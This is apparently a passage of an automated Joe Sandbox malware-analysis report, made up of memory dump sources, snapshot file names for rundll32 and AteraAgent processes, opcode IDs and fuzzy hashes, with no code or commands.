                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c579cc21d7dddf58fa7f5ebad4812cfc347b38eea6bd46b4d8edf1af787c247
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A01D870B093455FDB095F78746A2163FF6EFC520231609EAD546CF161FD15AD0983D1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1457684593.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ed000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: dbaaaa7104ccda3738d04f169ca28bf928fca41a74a0aa1f354a64eb7daaa846
                                                                                                                                                                                                                                                                            • Instruction ID: e59859cf61d63fbabf44def5bb4c6eb4b054c79b12fc7c32733761eac1bcc19b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbaaaa7104ccda3738d04f169ca28bf928fca41a74a0aa1f354a64eb7daaa846
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D201F27050A3809FE7304A22CD84B67BF88DF49325F1CC56AEC580F282C27D9C46CAB2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1457684593.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ed000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: a3d6fa9d7fc026d93aa6c9c3865b9bfb1788f5c4f71c4766c72e60ebcae8af17
                                                                                                                                                                                                                                                                            • Instruction ID: 02a6c7f5087c735039be253038ee54c3de7bd2530ebcda15d65aecd92ce9b3a6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3d6fa9d7fc026d93aa6c9c3865b9bfb1788f5c4f71c4766c72e60ebcae8af17
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25E09AB080D388AFCB05CFB4E8505DDBFB49F0B200B2145EAC484DB222EA305A12D782
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: cacfef49fe39a18e6f2039ad3960b9167b2bd781e3c92cdc7b37359b67cc6370
                                                                                                                                                                                                                                                                            • Instruction ID: 2d7d2f3a66fd6174516719bf8a311ae226e121a153152895152f09375003bdb3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cacfef49fe39a18e6f2039ad3960b9167b2bd781e3c92cdc7b37359b67cc6370
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09E05B363953914FDB02577CE0605A53FB2FF4B755F1100D6D186CF2B2DA159842C744
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 379713f707a66f3881c4a0ffb21f15aac17813871026ecd38ee575df00c92686
                                                                                                                                                                                                                                                                            • Instruction ID: a8db567b7e381230b1d490447276cebb602a98f826fbef25cc48f6bd01f43f6a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 379713f707a66f3881c4a0ffb21f15aac17813871026ecd38ee575df00c92686
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3D0A7313616205FD204525CD450A59379DDB8A715B00049AF10ACB320C951FC410389
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6cd8d558dca5b6d614835957c4ae856dae2acec84c1cc341f15632349cb87fc3
                                                                                                                                                                                                                                                                            • Instruction ID: 8bfdd87dfd6f4efe2196d92c35b42168ae53498a5b0e418ec044cc00a8d55ba5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cd8d558dca5b6d614835957c4ae856dae2acec84c1cc341f15632349cb87fc3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12D0A73232461C6B96086654D8469AA7BADEB942623504423F9018B220DD607C4593DA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: fc6a2986b1e94783976a85bbd87b8b33ed9a9cecc7922f647a01726c6b6c6d2d
                                                                                                                                                                                                                                                                            • Instruction ID: c3f388c995773daa367ab80b203c26e909c02bdd270b83b3da2a07a41e367956
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc6a2986b1e94783976a85bbd87b8b33ed9a9cecc7922f647a01726c6b6c6d2d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98D05B363592845FD709D764F4164B67FB6AB4B3113045057D445CB575DE240851D744
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: aa8f2a0855ee2c4d2fd7207975f0c634922dccdf5b9296172640710d6957ab32
                                                                                                                                                                                                                                                                            • Instruction ID: 5cb02067f101fcaaf1aaa8e20b15b2420f33c3b2f05b37f403a89a22ba58fb14
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa8f2a0855ee2c4d2fd7207975f0c634922dccdf5b9296172640710d6957ab32
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04D05E7490920CDFCB04DFB4E94599DBFF9EB45200B2086A5980497224EE30AE01CB81
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000006.00000003.1456179180.0000000004330000.00000040.00000800.00020000.00000000.sdmp, Offset: 04330000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_3_4330000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 4bd588376b0fe8b86458f5945db1de88f04a49249b5f5345c4cf9934634d4a00
                                                                                                                                                                                                                                                                            • Instruction ID: 1fb4be817d90996924475b963c017878c2e48a544cbc1d53f49a375abadf5e86
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bd588376b0fe8b86458f5945db1de88f04a49249b5f5345c4cf9934634d4a00
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AD012B7664642AFD3024A0844911F77770FE72B1B3854191D08088057E2296153CAA1
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
Similarity
• API ID:
• String ID: 0W=
• API String ID: 0-2879975314
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 74fd20f7f6f0356f31c4ce7f7380169ae5ab6cfb51bc6ca91b6b6d84e22587c5
                                                                                                                                                                                                                                                                            • Instruction ID: 8fc610c5e6b63797c9ba32bdad400460ed4658dcec0b23f46babdde38f839e5c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74fd20f7f6f0356f31c4ce7f7380169ae5ab6cfb51bc6ca91b6b6d84e22587c5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DE1D37090DA4E8FEBA8DF28D8557E97BD1FB55350F04826ED84DC72A2CE74984487C1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 44c6afc72591893629a931a86e7b6baede3a29a418a2f4bad0b18f3ade4846ba
                                                                                                                                                                                                                                                                            • Instruction ID: 4faaa1e74a5b11f61bbd1018e38e2f964a33f1e3f824ed6ec4b48ad354d83a4a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44c6afc72591893629a931a86e7b6baede3a29a418a2f4bad0b18f3ade4846ba
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA116D7180AA199FE7A5DB2888557F97BA1EF46650F1441BAD00D932A2DE381E898B80
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: d7ea6719d7264e912c297afa72171c2b2b09fce3842f7a5ec8574163551f943c
                                                                                                                                                                                                                                                                            • Instruction ID: 4165512fdd54c8fae7bf99d83dbc6246150b15f210a3526b62f2cbf7a9b6d917
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7ea6719d7264e912c297afa72171c2b2b09fce3842f7a5ec8574163551f943c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE014C30C4E656CBE355DF2080002F8B6B4AF07340F5065BDD00E672A2CA799D88DA88
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: /3$/3$/3$/3$/3$/3$/3
                                                                                                                                                                                                                                                                            • API String ID: 0-1736428096
                                                                                                                                                                                                                                                                            • Opcode ID: 267b096df90224887e7d9cbaf788af7b968cf3b8f811c095a6896eedca63378b
                                                                                                                                                                                                                                                                            • Instruction ID: fc46bf39cea4818b45bb8740586190f1fe03554c26cb000ab44c18c126be74d0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 267b096df90224887e7d9cbaf788af7b968cf3b8f811c095a6896eedca63378b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83224B71908A1D8FDB99EB28C494AE9B7B2FF59304F6045FDC00ED7296CB35A981CB50
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: M_^
                                                                                                                                                                                                                                                                            • API String ID: 0-3807191693
                                                                                                                                                                                                                                                                            • Opcode ID: 28af8b78b48ffa7977ddaa39f00f4f803bb9b3b9b39ea5ed5229886f56449bb0
                                                                                                                                                                                                                                                                            • Instruction ID: 91cd2239bf90b8c93e427871a9f2ac1836fd5c45c093057235a84e53274e4635
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28af8b78b48ffa7977ddaa39f00f4f803bb9b3b9b39ea5ed5229886f56449bb0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88C1F477A0EA869FD351A778E8555F87BE0EF82261B0447FBD08DCB0A3E91D18498391
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1539302930.00007FFAAB540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB540000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab540000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 63
                                                                                                                                                                                                                                                                            • API String ID: 0-3819469774
                                                                                                                                                                                                                                                                            • Opcode ID: 33b57394620c0dee2e6400ed36d8ec080e2b1c3ab1ad2b3a5b399c1ff2de8044
                                                                                                                                                                                                                                                                            • Instruction ID: df46d152f8f277a05463c780b622470914ffa88377c31847b844b21cecaad729
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33b57394620c0dee2e6400ed36d8ec080e2b1c3ab1ad2b3a5b399c1ff2de8044
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2151C27070CA098FD758DB1CD895A7477E2FB9A710B1542BEE48FC32A6DE24EC068781
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1539302930.00007FFAAB540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB540000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab540000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: df8e7e460073753f02899cc2e08991b38b7ab9883ec96f9163bb870f540b5488
                                                                                                                                                                                                                                                                            • Instruction ID: a1d1dd4b6e5f5b95f85a50a892a16315431db21341ca67872c1483e9dcfa5fcb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df8e7e460073753f02899cc2e08991b38b7ab9883ec96f9163bb870f540b5488
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9F12761B0DA4A8FD799972CD8196B87BE2EF56310B1841FAD08FC71B3CD18AC4687C1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
Memory Dump Source
• Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1aaadbbfcb21bc2e7c53ec0eca1ae1f4194502b1acdd0ecd63c4e5545eefbaae
                                                                                                                                                                                                                                                                            • Instruction ID: 992802590347a644d46d33821c65818afd5647d9c599bd48c440d3c4ccfa67f4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1aaadbbfcb21bc2e7c53ec0eca1ae1f4194502b1acdd0ecd63c4e5545eefbaae
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1C1E76190EE868FF795DB6888559A57BE0EF53350F1842FED08DCB1A3E9389C4987C0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7bf330d50cd8b41192ac28088529cf0d7ce0818f4e4f0621423b4ca614db734d
                                                                                                                                                                                                                                                                            • Instruction ID: 18bac648b2ae7128446f1714760374063b0735707cec0dc7e4753478a68721d9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bf330d50cd8b41192ac28088529cf0d7ce0818f4e4f0621423b4ca614db734d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EB1C27050DA4D8FEB68EF28C855BE93BD1FF59350F04826EE44DC7292CA74A945CB82
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 60d8221dd48f7bd08671760b9e45cb86b9488f893e69e853bb17da250bfdbf07
                                                                                                                                                                                                                                                                            • Instruction ID: 450fce5ffb77a23925935d16d9bf6178de60c881e2bf3ecbb91a5aeb7e6ef7d8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60d8221dd48f7bd08671760b9e45cb86b9488f893e69e853bb17da250bfdbf07
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3DB1B674908A5D8FDF94EF68C894BA9BBF1FF69301F1041AAD00DE7261DA34AD85CB40
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 36a298065cc896075b996f281cab132fcb437d6b6e3b273e2dfb824c81116188
                                                                                                                                                                                                                                                                            • Instruction ID: c0d38b6a0f1a5e178a0e4526b2e602b875ae91a4e1b52347d356a34a4953e29f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36a298065cc896075b996f281cab132fcb437d6b6e3b273e2dfb824c81116188
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40B19E7180A66A8FD765DB64C8557E8BBF1EF45350F1441F9C04EA72A2CA7C1E8ACF40
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0e496408c6a0586e32373116cf60fc000c9cc0adb3d2426919e5a8d4a0a7c53c
                                                                                                                                                                                                                                                                            • Instruction ID: 578c38151bbc9ce7175433219f4f17bd9e3fbae7511f3dabd169b901a749d64d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e496408c6a0586e32373116cf60fc000c9cc0adb3d2426919e5a8d4a0a7c53c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0791B07180EB899FD742DBA49815AE9BFF0EF16320F0801FED049DB1A3DA6C5885C791
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0faee1714bcb09e72891f3d9fef532b0b05cd34f03d403bd62491d27f3faa855
                                                                                                                                                                                                                                                                            • Instruction ID: 3731699ad025769e7fcdd8d041123fd473038551272318484045ff2bd8d14577
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0faee1714bcb09e72891f3d9fef532b0b05cd34f03d403bd62491d27f3faa855
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4561487090AA5DCFDBA5DB68C4457ACB7B1FF16340F5082ADC00EE7291CA386D89CB81
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e96ed79459a157afbf1e1a4c03156ebb0066f59c7d4e0003a8957dfb2a185ddc
                                                                                                                                                                                                                                                                            • Instruction ID: 239c0082c65cea63888099dd295886559025a71d386a6baf17328d55f96ac6bf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e96ed79459a157afbf1e1a4c03156ebb0066f59c7d4e0003a8957dfb2a185ddc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E516271908A1C8FDB58DB68D845BE9BBF1FF59310F0082AAD04DD3252DE34A9858F81
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 237f428dcc09dae57a36f68c15df56319e40e774bb7c7eca20a62a6db70a84c0
                                                                                                                                                                                                                                                                            • Instruction ID: 6133b9bc52af119f3cbab0dd5eba456b45cc11d092ff506a3ea7ebcc2659bad0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 237f428dcc09dae57a36f68c15df56319e40e774bb7c7eca20a62a6db70a84c0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC512B3094990DCFDB84EFA8D455AEDB7B5FF5A300F5045ADD00EE72A1DA34A845CB90
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1539302930.00007FFAAB540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB540000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab540000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: aef6da0376665d75e3782846523d02a43b1b20f906258a4dd7ac6f38d1ac29ee
                                                                                                                                                                                                                                                                            • Instruction ID: 6326dd29fa21a15c3af4510db2a96bddb406c7626629eea893c3d15f3bc0b9ff
